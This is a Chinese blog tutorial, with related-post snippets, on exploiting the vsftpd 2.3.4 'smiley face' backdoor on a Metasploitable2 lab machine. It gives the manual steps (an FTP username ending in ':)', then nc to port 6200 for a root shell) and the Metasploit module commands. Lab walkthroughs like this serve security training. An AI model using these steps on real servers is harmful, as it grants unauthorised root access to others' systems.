FTP服务后门利用 - vsftpd_234_backdoor(笑脸漏洞)

最新推荐文章于 2025-03-07 15:57:17 发布
最新推荐文章于 2025-03-07 15:57:17 发布
阅读量3.2k 收藏 26
点赞数 20
文章标签: kali 渗透测试 kali linux 靶机 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46329243/article/details/113620317
版权

vsftpd_234_backdoor(笑脸漏洞)

    攻击机和受害机的IP
    kali: 192.168.75.130
    Metasploitable2 - Linux: 192.168.75.128

方法一:

1.测试其流通性

在这里插入图片描述
2. 扫描受害机的服务信息
在这里插入图片描述
3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意

在这里插入图片描述
注意(在输入密码回车后会有停顿,记住不要关闭ftp连接)
4. 此时扫描到受害机会反弹一个6200端口
在这里插入图片描述
5.使用 nc 连接会发现是root权限
在这里插入图片描述
笑脸漏洞利用成功.

如果上面的方法不会的话,下面介绍更简单的方法。

方法二:

打开msf框架
命令为:msfconsole
在这里插入图片描述

搜索笑脸漏洞
命令为: search vsftpd
在这里插入图片描述
使用改模块
命令为: use 0 或者 use exploit/unix/ftp/vsftpd_234_backdoor
在这里插入图片描述
设置攻击的受害机
命令为: set rhosts 192.168.75.128
在这里插入图片描述
运行该模块
命令为: run 或者 exploit
在这里插入图片描述
同样获取的也是root权限。
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!

vsftpd2.3.4 后门利用脚本编写
wjq18827615690的博客
01-31 1278
安全开发-Vsftpd2.3.4后门利用脚本编写 来自法老的博客 Python专题 Created At :2021-01-29 16:59 Views ???? :15 一:漏洞起源 二:手动利用 靶场环境 定位 环境 IP Address 攻击机 Python3.8 192.168.31.33 靶机 Metasploitable2 192.168.31.20 步骤一:FTP登录 使用用户名+:)来进行用户登录,密码随便填写,连接
metasploitable2渗透:Metasploit攻击VSFTPD2.3.4后门漏洞
qq_43054896的博客
03-25 2584
攻击机 kali:192.168.88.147 靶机 metasploitable2:192.168.88.135 一、主机探测,信息收集 1、利用masscan进行主机端口扫描 使用masscan主要是为了进行快速扫描,查看目标主机metasploitable是否在线,开放端口有哪些 masscan -p 0-65535 --rate 100000 192.168.88.135 根据开放...
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution
热门推荐
兰以为佩
04-26 1万+
该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 靶机:metasploitable2 (IP:192.168.120.234) 攻击机:Kali (IP:192.168.120.6) 打开靶机metasploitable2确保网络连通...
使用 Kali Linux 攻击 Metasploitable 2 的 VSFTPD 2.3.4 后门漏洞
最新发布
2401_88258429的博客
03-07 532
exploit/unix/ftp/vsftpd_234_backdoor(该模块点击上图中标注好的就可以,不需要打出来)### set RHOSTS 192.168.1.7(目标地址,上文已经说过我的是192.168.1.7)老师让通过自学实现一个简单的攻击项目。通过利用AI成功实现,简单记录一下吧。利用kali和metasploitable来攻击。,表示你已获取最高权限。运行以下命令可以加载模块。(你应该看到当前用户是。运行以下命令设置目标。
Vsftpd后门
qq_54713392的博客
05-09 751
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
vsftpd_234漏洞利用
echoonly1999的博客
03-08 4807
vsftpd漏洞利用 sybg写着不合心意,在这里记录下(划掉) 分为三部分: 1. vsftp服务 2 .漏洞代码 3.漏洞利用的两种方式 vsftp服务 (Metasploitable2使用指南) Metasploitable2在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经...
vsftpd 2.3.40笑脸后门复现
qq_51687418的博客
12-14 3066
1.实验准备:kali虚拟机、metasploitable2靶机,两台虚拟机均为NAT链接 2.运行kali和metasploitable2 3.在kali用nmap上扫描局域网内存活主机指令:nmap 本机ip/24 4.发现metasploitable2 靶机,对其进行nmap操作得到如下结果! 发现其ftp使用的是vsftpd 2.3.4,存在笑脸后门漏洞。 5. ftp登录输入指令:ftp metasploitable2的ip,输入账户:任意字符包含:) 输入密码:随意 打开另外一个命令框输入指令
kali metasploit 漏洞利用
qq_51685718的博客
10-28 763
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。传递通过 MS-RPC 提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在 smb.conf 中,导致允许远程命令执行。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。不需要身份验证来利用漏洞,因为此选项用于在身份验证之前映射用户名。
Metasploit2 - tcp port 21 - vsftpd
Nixawk
07-29 1387
Metasploitable2: tcp port 21 - vsftpd Metasploitable2的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)”[笑脸],那么在6200端口会监听一个后门. msf> use exploit/unix/ftp/vsftpd_234_ba
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1163
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9601
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
vsftp234--POC.py
04-03
该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。
vsftpd后门 Compromised Source Packages Backdoor Vulnerability复现
weixin_69925635的博客
07-17 396
靶机:Metasploittable ip:192.168.204.130。set RHOST 192.168.204.130将靶机设为攻击目标。在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞。show options查看对靶机的攻击方式(设置参数)search vsftpd查找vsftpd漏洞。首先在kali中启动msfconsole。进入靶机的root权限,完成后门。攻击机:kali linux
Ftp笑脸漏洞VSFTPD 2.3.4)复现(后门漏洞
m0_62670778的博客
05-10 2719
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
Vsftpd2.3.4后门利用脚本编写
gugonggugong的博客
01-31 659
一、漏洞介绍 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 二、漏洞复现 Linux源代码安装Vsftpd2.3.4: wgethttp://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz #下载安装包 tarzxvf...
笑脸漏洞利用
m0_62210217的博客
11-01 785
靶机metasploit :192.168.153.132 使用nmap对靶机进行信息收集 这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随便填写 这时靶机的6200端口会开启 接下来用nc连接即可 最后直接可以获取root权限了 ...
笑脸漏洞的使用
weixin_54584489的博客
11-07 401
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 打开nmap,查看主机ip地址 用命令符号nmap -sn扫描对应子网,查看在线主机 这里我选取目标主机ip地址为192.168.202.129的主机作为目标靶机,用命令符nmap -.
FTP服务后门
qq_44813849的博客
06-08 1078
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。 通过扫描靶机IP为:192.168.174.131 攻击机IP为:192.168.174.128 扫描主机服务信息以及服务版本 可以使用searchsploit来查看对应的版本该服务有没有可利用漏洞 发现了两个利用漏洞,并...
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2434
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Star abuse

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值